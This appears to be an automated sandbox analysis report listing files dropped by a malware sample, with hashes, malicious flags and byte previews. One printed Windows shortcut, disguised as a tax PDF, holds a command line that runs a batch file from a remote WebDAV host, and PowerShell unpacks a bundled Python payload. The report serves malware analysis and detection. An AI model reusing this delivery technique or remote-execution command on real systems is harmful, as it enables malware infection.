                              Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r. ......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:Microsoft Outlook email folder (>=2003)
                              Category:dropped
                              Size (bytes):271360
                              Entropy (8bit):1.5065614551539397
                              Encrypted:false
                              SSDEEP:
                              MD5:B473E58891CF0ED9B56B3221BF24116E
                              SHA1:E94B2A8E49A46185694BBFF3181613DAF074E303
                              SHA-256:29471F0B736283D3581847C4017217999673AD6507A4AE7DEC3FFEF58D5D6315
                              SHA-512:F2521EE94C402C6BF562F09D030310DB6EFF3940F924331F2116BEF9188A71691991B80EF659E9FC96FA3DC6C386C1B859213B4A7EB9EE76C84CB5510D255EF6
                              Malicious:false
                              Reputation:unknown
                              Preview:!BDN..xSM......\.......................\................@...........@...@...................................@...........................................................................$.......D.......:..........................................................................................................................................................................................................................................................................................................................H.........,.Wl......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

                              Download File
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):131072
                              Entropy (8bit):0.9486269116849599
                              Encrypted:false
                              SSDEEP:
                              MD5:CACCD2D1AB3E3C0A7E61DE3ECF4E9E97
                              SHA1:64CF10D4EF02914A68EA68FB6200240F760EF3AB
                              SHA-256:7202B38CE19431DDCB956B2323C343C37B689A0D1607EE706ABBD989F4DEC86C
                              SHA-512:3FB1CBE97CB1FC9F978B92D14CEE280A5C9CA098B60837DCC6C685E75BFF9A7C7D92EE77080A2C921F15F65E337A16AC31E4750F5E31C7E409F3BF01273CB3C6
                              Malicious:false
                              Reputation:unknown
                              Preview:0.q.C...J.....................................#.!BDN..xSM......\.......................\................@...........@...@...................................@...........................................................................$.......D.......:..........................................................................................................................................................................................................................................................................................................................H.........,.Wl...............B............#.........................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\7075362a-5124-4927-b03e-58ab1ec515b3.tmp

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Fri May 24 12:15:12 2024, mtime=Fri May 24 12:15:12 2024, atime=Fri May 24 12:15:12 2024, length=987136, window=hidenormalshowminimized
                              Category:dropped
                              Size (bytes):1345
                              Entropy (8bit):4.490682361972022
                              Encrypted:false
                              SSDEEP:
                              MD5:89D697F48E550C6EAA831DF659581819
                              SHA1:3F65CC0124EEE7528E4942F5E4CEE37E73652FBD
                              SHA-256:D939765A8BB0E9509DC9EA46683D18172356A4BC77733014CCEFD5056F8BC528
                              SHA-512:54E68802DC5D66F5820267487014C76AA38F51556210DBE31F554607054574B09A8B3CA34F4A77E663CA61CBABA290B8ACB8DE93252A56AB4CF627141663AA46
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.... ......h......h......h...........................A....P.O. .:i.....+00.../C:\...................V.1......X....Windows.@......R.@.X..............................j.W.i.n.d.o.w.s.....Z.1......X...System32..B......R.@.X...........................x...S.y.s.t.e.m.3.2.....b.2......X.i .conhost.exe.H......X.i.X.i.....l........................c.o.n.h.o.s.t...e.x.e.......N...............-.......M....................C:\Windows\System32\conhost.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.%.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.c.o.n.h.o.s.t...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.:.-.-.h.e.a.d.l.e.s.s. .\.\.b.u.r.r.k.e.k.l.p.r.i.n.t.i.n.g...t.e.c.h.@.7.1.1.9.\.D.a.v.W.W.W.R.o.o.t.\.n.e.w...b.a.t.9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%...............wN....]N.D...Q......`.......X.......vps47073.........W.I%..

                              C:\Users\user\Downloads\DXJS.zip

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                              Category:modified
                              Size (bytes):48201681
                              Entropy (8bit):7.995513125443279
                              Encrypted:true
                              SSDEEP:
                              MD5:F8F3B0FE0E0E2DD220011B18C3634885
                              SHA1:52457C76E0DB08F9B5385A0F2AD96474D98B8E76
                              SHA-256:E10173D3F7958AAD8FFC646A6AEF6AC6F97C3E3C6F2985DF35DAB6E185F9126A
                              SHA-512:2B85542851B7BD788997A5F06E31B77E285A8F991BDD13CA7EDCC3FE3626359B413F2A76CB79424E7C66A9C716234A98D52C49259614DEBF8746785939B064CC
                              Malicious:true
                              Reputation:unknown
                              Preview:PK...........X................Python/Launcher/PK........Vv.Xn...44..........Python/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...

                              C:\Users\user\Downloads\E_TAX_DOC438093562789873345672_pdf.download (copy)

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Fri May 24 12:15:12 2024, mtime=Fri May 24 12:15:12 2024, atime=Fri May 24 12:15:12 2024, length=987136, window=hidenormalshowminimized
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:89D697F48E550C6EAA831DF659581819
                              SHA1:3F65CC0124EEE7528E4942F5E4CEE37E73652FBD
                              SHA-256:D939765A8BB0E9509DC9EA46683D18172356A4BC77733014CCEFD5056F8BC528
                              SHA-512:54E68802DC5D66F5820267487014C76AA38F51556210DBE31F554607054574B09A8B3CA34F4A77E663CA61CBABA290B8ACB8DE93252A56AB4CF627141663AA46
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.... ......h......h......h...........................A....P.O. .:i.....+00.../C:\...................V.1......X....Windows.@......R.@.X..............................j.W.i.n.d.o.w.s.....Z.1......X...System32..B......R.@.X...........................x...S.y.s.t.e.m.3.2.....b.2......X.i .conhost.exe.H......X.i.X.i.....l........................c.o.n.h.o.s.t...e.x.e.......N...............-.......M....................C:\Windows\System32\conhost.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.%.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.c.o.n.h.o.s.t...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.:.-.-.h.e.a.d.l.e.s.s. .\.\.b.u.r.r.k.e.k.l.p.r.i.n.t.i.n.g...t.e.c.h.@.7.1.1.9.\.D.a.v.W.W.W.R.o.o.t.\.n.e.w...b.a.t.9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%...............wN....]N.D...Q......`.......X.......vps47073.........W.I%..

                              C:\Users\user\Downloads\E_TAX_DOC438093562789873345672_pdf.download.crdownload (copy)

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=13, Archive, ctime=Fri May 24 12:15:12 2024, mtime=Fri May 24 12:15:12 2024, atime=Fri May 24 12:15:12 2024, length=987136, window=hidenormalshowminimized
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:89D697F48E550C6EAA831DF659581819
                              SHA1:3F65CC0124EEE7528E4942F5E4CEE37E73652FBD
                              SHA-256:D939765A8BB0E9509DC9EA46683D18172356A4BC77733014CCEFD5056F8BC528
                              SHA-512:54E68802DC5D66F5820267487014C76AA38F51556210DBE31F554607054574B09A8B3CA34F4A77E663CA61CBABA290B8ACB8DE93252A56AB4CF627141663AA46
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.... ......h......h......h...........................A....P.O. .:i.....+00.../C:\...................V.1......X....Windows.@......R.@.X..............................j.W.i.n.d.o.w.s.....Z.1......X...System32..B......R.@.X...........................x...S.y.s.t.e.m.3.2.....b.2......X.i .conhost.exe.H......X.i.X.i.....l........................c.o.n.h.o.s.t...e.x.e.......N...............-.......M....................C:\Windows\System32\conhost.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.%.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.c.o.n.h.o.s.t...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.:.-.-.h.e.a.d.l.e.s.s. .\.\.b.u.r.r.k.e.k.l.p.r.i.n.t.i.n.g...t.e.c.h.@.7.1.1.9.\.D.a.v.W.W.W.R.o.o.t.\.n.e.w...b.a.t.9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%...............wN....]N.D...Q......`.......X.......vps47073.........W.I%..

                              C:\Users\user\Downloads\FTSP.zip.crdownload

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                              Category:dropped
                              Size (bytes):27459584
                              Entropy (8bit):7.923342801429565
                              Encrypted:false
                              SSDEEP:
                              MD5:E53DC99C1FC9A54CD6F82F0DAC9B7F8B
                              SHA1:CCD2B673F39AAC9B3B96D26D5A2C7B54535E546A
                              SHA-256:EBF1B66FF98A52101A9B1792D2A68E4A2365BFE3B89946D9F302499F8CC9E871
                              SHA-512:D0C3F0471D9DC45CC724CB0D4384AD667E7345C8A31EE3708C6DDA1F51635E0FB300AFFBAE183DEF7451E43D0AAC5FAF79AB15F6FE4AECDD337E0B3E8E620EC9
                              Malicious:false
                              Reputation:unknown
                              Preview:PK.........B.X................Print/Launcher/PK........Vv.Xn...44..........Print/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...Bh

                              C:\Users\user\Downloads\Python\Launcher\py.exe

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):766232
                              Entropy (8bit):6.46742031055219
                              Encrypted:false
                              SSDEEP:
                              MD5:79EAE4FA8DD7E1CA489E59AB19B4FBED
                              SHA1:48EB42D40490AC4CE6C30245C631CC24718601C9
                              SHA-256:E52553F941CEB9E715D239E7A211501CE5D6096EEEB90FB161B7BFEDF6A61DAB
                              SHA-512:F8AE33F15F9FA00C7B5786119C452722EDEB9FA39350E7087CD86CE732BBD0571DBE2C9B96ED813770E9401BF4BED53362659D763BE66C85A68FA912DCB3C625
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v66L2WX.2WX.2WX.y/[.8WX.y/]..WX.y/\.&WX.4.]..WX.4.\. WX.4.[.&WX.;/..0WX.y/Y.5WX.2WY.CWX.].P.3WX.]..3WX.].Z.3WX.Rich2WX.........................PE..L....G.f...............&.....r.......j.......0....@.......................................@.....................................d......................../..........H...T...............................@............0...............................text...c........................... ..`.rdata..~....0......................@..@.data...............................@....rsrc...............................@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Launcher\pyshellext.amd64.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):50968
                              Entropy (8bit):5.944269629896292
                              Encrypted:false
                              SSDEEP:
                              MD5:740DCC24BA59F6205DE3D5C5575A19A7
                              SHA1:2A911E51BB2571F5792C49008A2A2103FC0ED0AD
                              SHA-256:6A4A987548A8FA13C8678FDAE921C2084A92048E6002400D5C48D695C502E0BD
                              SHA-512:E652043DA39B4FE631E428D8422B642CF3BCAB0B2068BEFA7056CFC8C601CFA95F7C6FAA552F53DC3F773834D192B3EDA7F69BDB78ECE6BB0CB9278779CD8D24
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v..2O..2O..2O..;7..6O..4..6O..4..&O..4..:O..4..1O..y7..?O..2O..{O..]..3O..]..3O..].B.3O..]..3O..Rich2O..........................PE..d...sK.f.........." ...&.2...h.......5..............................................S.....`.........................................`...........................\......../......8....k..T...........................Pj..@............P..h............................text....0.......2.................. ..`.rdata..DB...P...D...6..............@..@.data................z..............@....pdata..\...........................@..@.rsrc...............................@..@.reloc..8...........................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Launcher\pyw.exe

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):764696
                              Entropy (8bit):6.46605957265092
                              Encrypted:false
                              SSDEEP:
                              MD5:789952F58D76B2F41E8EADD9FAE66906
                              SHA1:AB0324A701404A1818FD0C3E49F0706108F3C5AE
                              SHA-256:3C92D3E88C5B9DB5D0E655F72E20682B43C5E96CB939C0C7576883A10ADE18FD
                              SHA-512:FD380FF7C64576A112B994BDCB7E645C34D5D6378F1A921B2342AD7A00F57D7E8C485BBA03C20A6E7B143493E83DF7EA0CC31B31C763571BA7F0268D660D391A
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:+c.~J..~J..~J..52..tJ..52...J..52..jJ..x...XJ..x...lJ..x...jJ..w2..|J..52..wJ..~J...J.......J.......J.......J..Rich~J..........................PE..L....G.f...............&.....t......@j....... ....@.................................$6....@....................................x....................|.../..............T...............................@............ ...............................text...s........................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):71448
                              Entropy (8bit):6.244392352614308
                              Encrypted:false
                              SSDEEP:
                              MD5:28D2A0405BE6DE3D168F28109030130C
                              SHA1:7151ECCBD204B7503F34088A279D654CFE2260C9
                              SHA-256:2DFCAEC25DE17BE21F91456256219578EAE9A7AEC5D21385DEC53D0840CF0B8D
                              SHA-512:B87F406F2556FAC713967E5AE24729E827F2112C318E73FE8BA28946FD6161802DE629780FAD7A3303CF3DBAB7999B15B535F174C85B3CBB7BB3C67915F3B8D0
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l[.~...~...~.......~.......~.......~.......~.......~.......~.......~...~..=~.......~.......~.......~.......~..Rich.~..................PE..d...wK.f.........." ...&.f................................................... ............`.............................................P......d......................../..............T...........................@...@............................................text...%d.......f.................. ..`.rdata..pO.......P...j..............@..@.data...h...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):85272
                              Entropy (8bit):6.581027304618609
                              Encrypted:false
                              SSDEEP:
                              MD5:223FD6748CAE86E8C2D5618085C768AC
                              SHA1:DCB589F2265728FE97156814CBE6FF3303CD05D3
                              SHA-256:F81DC49EAC5ECC528E628175ADD2FF6BDA695A93EA76671D7187155AA6326ABB
                              SHA-512:9C22C178417B82E68F71E5B7FE7C0C0A77184EE12BD0DC049373EACE7FA66C89458164D124A9167AE760FF9D384B78CA91001E5C151A51AD80C824066B8ECCE6
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D...*...D.k.*...D...*...Rich+...........................PE..d....K.f.........." ...&.....^...............................................`.......b....`.............................................H............@.......0..8......../...P..........T...........................p...@............................................text............................... ..`.rdata...>.......@..................@..@.data........ ......................@....pdata..8....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):125208
                              Entropy (8bit):6.122025398643493
                              Encrypted:false
                              SSDEEP:
                              MD5:BBD5533FC875A4A075097A7C6ABA865E
                              SHA1:AB91E62C6D02D211A1C0683CB6C5B0BDD17CBF00
                              SHA-256:BE9828A877E412B48D75ADDC4553D2D2A60AE762A3551F9731B50CAE7D65B570
                              SHA-512:23EF351941F459DEE7ED2CEBBAE21969E97B61C0D877CFE15E401C36369D2A2491CA886BE789B1A0C5066D6A8835FD06DB28B5B28FB6E9DF84C2D0B0D8E9850E
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&e..b..b..b..k|H.d..d..`..d..n..d..j..d..f.....`..)|.c..)|.d...x.a..b........d.....c....$.c.....c..Richb..................PE..d....K.f.........." ...&............\_..............................................j.....`.........................................``.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..Xl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):37144
                              Entropy (8bit):6.534690543709126
                              Encrypted:false
                              SSDEEP:
                              MD5:DE7F1806F2B9154850C69A7D91131F44
                              SHA1:8B1D3657742B455A67B10520742DBAFAB57548B6
                              SHA-256:F24A4A747D4384AF7D7716CEF4DE8B161F905FEE65D473828D66E97ADC7A92C4
                              SHA-512:2904EC99CCFCABF2154A113AB5BB3BB42611F05F8CDCC3DDDFA037390B188ACA4D27B2EFDC23844547F26683FC71CAF7300164931E43056422E8ECF4F3066607
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..(..(..(..!.M.$...0.*...0.%...0. ...0.+..G0.*..c..-..(.....G0.)..G0.)..G0!.)..G0.)..Rich(..........PE..d...eK.f.........." ...&.*...:.......-...............................................#....`..........................................L......`Z.......................b.../......P...PE..T............................D..@............@...............................text...H(.......*.................. ..`.rdata... ...@..."..................@..@.data........p.......P..............@....pdata...............R..............@..@.rsrc................V..............@..@.reloc..P............`..............@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):251672
                              Entropy (8bit):6.565757128183933
                              Encrypted:false
                              SSDEEP:
                              MD5:3055EDF761508190B576E9BF904003AA
                              SHA1:F0DC8D882B5CD7955CC6DFC8F9834F70A83C7890
                              SHA-256:E4104E47399D3F635A14D649F61250E9FD37F7E65C81FFE11F099923F8532577
                              SHA-512:87538FE20BD2C1150A8FEFD0478FFD32E2A9C59D22290464BF5DFB917F6AC7EC874F8B1C70D643A4DC3DD32CBE17E7EA40C0BE3EA9DD07039D94AB316F752248
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...yK.f.........." ...&.p...<......................................................i ....`..........................................D..P....E..................`'......./......T.......T...........................@...@............................................text...9o.......p.................. ..`.rdata..H............t..............@..@.data...X*...`...$...L..............@....pdata..`'.......(...p..............@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):133400
                              Entropy (8bit):6.437312765343779
                              Encrypted:false
                              SSDEEP:
                              MD5:B479ED301E990690A30FC855E6B45F94
                              SHA1:177B508A602C5662350DAE853B5E9DB1475908A7
                              SHA-256:0C488E6883A70CD54A71A9E28796F87EF6CC0D288260A965CBB24BF1D7309A20
                              SHA-512:D410355BFE39A7666E7297D3654B0B8DD3919D4AE3BBF7D258ACDF76276ECC3BA3718F09BA708E3103D367EA6D352E98B6DE265E3746B973B421E0A68B8D37A8
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Oj.L..KL..KL..KEV.KB..KJ..JN..KJ..JA..KJ..JD..KJ..JO..K#..JN..K.V.JO..KL..K...K#..JH..K#..JM..K#..KM..K#..JM..KRichL..K........PE..d...{K.f.........." ...&.:..........|...............................................Z.....`.............................................X...X...x......................../......p....[..T............................Z..@............P...............................text....8.......:.................. ..`.rdata..Nk...P...l...>..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):65816
                              Entropy (8bit):6.241463396742061
                              Encrypted:false
                              SSDEEP:
                              MD5:EEDB6D834D96A3DFFFFB1F65B5F7E5BE
                              SHA1:ED6735CFDD0D1EC21C7568A9923EB377E54B308D
                              SHA-256:79C4CDE23397B9A35B54A3C2298B3C7A844454F4387CB0693F15E4FACD227DD2
                              SHA-512:527BD7BB2F4031416762595F4CE24CBC6254A50EAF2CC160B930950C4F2B3F5E245A486972148C535F8CD80C78EC6FA8C9A062085D60DB8F23D4B21E8AE4C0AD
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.A:...:...:...3ca.>...<...8...<...6...<...2...<...9...U...8...qc..8.......9...:.......U...;...U...;...U...;...U...;...Rich:...........................PE..d....K.f.........." ...&.T..........L@..............................................lg....`.............................................P.............................../......X...@}..T............................|..@............p..(............................text...wS.......T.................. ..`.rdata..&O...p...P...X..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):160024
                              Entropy (8bit):6.841300813767097
                              Encrypted:false
                              SSDEEP:
                              MD5:05E8B2C429AFF98B3AE6ADC842FB56A3
                              SHA1:834DDBCED68DB4FE17C283AB63B2FAA2E4163824
                              SHA-256:A6E2A5BB7A33AD9054F178786A031A46EA560FAEEF1FB96259331500AAE9154C
                              SHA-512:BADEB99795B89BC7C1F0C36BECC7A0B2CE99ECFD6F6BB493BDA24B8E57E6712E23F4C509C96A28BC05200910BEDDC9F1536416BBC922331CAE698E813CBB50B3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MRu.MRu.MRu.D*..IRu.K.t.ORu.K.p.ARu.K.q.ERu.K.v.NRu.".t.NRu..*t.ORu.MRt.(Ru.".x.wRu.".u.LRu."..LRu.".w.LRu.RichMRu.........................PE..d....K.f.........." ...&.f...........8..............................................`3....`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text....d.......f.................. ..`.rdata..............j..............@..@.data...h....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):44824
                              Entropy (8bit):6.251859814548239
                              Encrypted:false
                              SSDEEP:
                              MD5:88D20E77E718FF62CE5F01BC6CBCEB88
                              SHA1:8FE2A1FEED9A7D16DC61E7DED17F16080E43393F
